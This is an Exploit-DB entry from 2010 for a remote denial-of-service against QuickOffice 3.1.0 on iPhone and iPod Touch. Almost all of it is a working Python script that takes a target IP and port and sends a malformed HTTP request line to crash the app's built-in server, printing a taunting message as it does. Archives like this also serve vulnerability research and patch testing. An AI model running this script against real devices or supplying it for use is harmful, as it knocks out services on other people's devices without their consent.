iOS QuickOffice 3.1.0 - HTTP Method Remote Denial of Service

EDB-ID:

13870

CVE:

N/A




Platform:

iOS

Date:

2010-06-14


# Exploit: QuickOffice v3.1.0 for iPhone/iPod Touch Malformed HTTP Method Remote DoS
# Date: 14/06/2010
# Author: Nishant Das Patnaik
# Website: http://nishantdaspatnaik.yolasite.com
# Software Link: http://itunes.apple.com/us/app/quickoffice-connect/id304673686?mt=8
# Version: 3.1.0
# Tested on: iPod 2G with iOS v3.1.3
# Note: QuickOffice Connect v3.1.0 and prior program versions may be also vulnerable.


#!/usr/bin/env python
import os
import sys
import socket
def main(argv):
    argc = len(argv)
    if argc != 3:
        print "Usage: %s <target-ip> <target-port>" % (argv[0])
        sys.exit(0)
    host = argv[1]
    port = int(argv[2])
    print "[+] Connecting: %s:%d" % (host, port)
    payload = ". / HTTP/1.1\r\n\r\n"
    sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sd.connect((host, port))
    print "[+] Sending payload..."
    print "[+] Did you see that b00m? http://nishantdaspatnaik.yolasite.com"
    sd.send(payload)
    sd.close()
if __name__ == "__main__":
    main(sys.argv)
    sys.exit(0)